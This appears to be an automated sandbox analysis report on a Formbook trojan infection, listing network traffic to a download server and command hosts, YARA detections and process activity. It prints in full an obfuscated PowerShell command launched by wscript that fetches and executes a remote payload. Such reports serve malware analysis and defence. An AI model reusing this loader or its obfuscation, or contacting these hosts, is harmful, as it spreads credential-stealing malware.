        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose,13_2_02D0B6B0

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\SysWOW64\recover.exeCode function: 4x nop then xor eax, eax13_2_02CF9330
        Source: C:\Windows\SysWOW64\recover.exeCode function: 4x nop then pop edi13_2_02D01C1B
        Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
        Source: global trafficHTTP traffic detected: GET /domkapitler.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /AKaUDBTG140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jackcliu.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.smartfindsdepot.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: www.barpa.be
        Source: global trafficDNS traffic detected: DNS query: www.jackcliu.com
        Source: global trafficDNS traffic detected: DNS query: www.smartfindsdepot.shop
        Source: unknownHTTP traffic detected: POST /u88q/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.smartfindsdepot.shopOrigin: http://www.smartfindsdepot.shopContent-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.smartfindsdepot.shop/u88q/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36Data Raw: 4a 44 31 78 3d 49 6c 59 65 4a 53 4c 55 33 55 47 4f 4d 6b 56 53 62 56 71 48 4f 6b 6a 70 78 75 6f 7a 78 38 5a 39 6b 4a 78 77 7a 30 69 39 6e 68 53 53 4a 44 65 74 57 51 47 6d 46 46 49 2f 77 64 63 75 4c 64 49 34 4a 43 47 57 52 72 67 44 6b 75 43 67 46 49 75 74 47 31 52 56 4b 72 52 37 74 55 70 46 6a 34 64 73 70 54 2b 54 31 4e 4f 31 70 6a 4f 5a 53 6d 69 4e 54 59 32 37 6e 48 54 2b 69 53 32 75 6c 75 5a 59 58 75 6a 35 38 69 68 58 71 73 37 58 4b 6f 79 74 36 43 6e 34 58 61 71 43 31 37 53 46 52 61 35 65 61 57 71 59 34 51 7a 7a 58 37 36 44 73 42 33 58 65 72 4a 74 54 6f 6e 72 31 79 4b 5a 71 59 51 36 4d 64 4b 4d 45 6a 73 61 54 66 41 57 Data Ascii: JD1x=IlYeJSLU3UGOMkVSbVqHOkjpxuozx8Z9kJxwz0i9nhSSJDetWQGmFFI/wdcuLdI4JCGWRrgDkuCgFIutG1RVKrR7tUpFj4dspT+T1NO1pjOZSmiNTY27nHT+iS2uluZYXuj58ihXqs7XKoyt6Cn4XaqC17SFRa5eaWqY4QzzX76DsB3XerJtTonr1yKZqYQ6MdKMEjsaTfAW
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 19:57:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 30 0d 0a 0d 0a Data Ascii: 0
        Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
        Source: wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163//
        Source: wab.exe, 0000000A.00000002.2632499102.000000001F2F0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin
        Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin/
        Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/AKaUDBTG140.binb
        Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin~OU
        Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/domkapitler.msiP
        Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/domkapitler.msiXR
        Source: powershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
        Source: powershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microv
        Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartfindsdepot.shop
        Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartfindsdepot.shop/u88q/
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: recover.exe, 0000000D.00000003.3123298265.0000000007BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: amsi64_7108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_1364.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Call Blgfrugts.ShellExecute("P" & alphameric & ".e" + "xe", Sgeord, "", "", Universitetslektorer)
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3327
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3327
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3327Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3327Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_1FDE2DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1FDE2C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE2B60 NtClose,LdrInitializeThunk,10_2_1FDE2B60
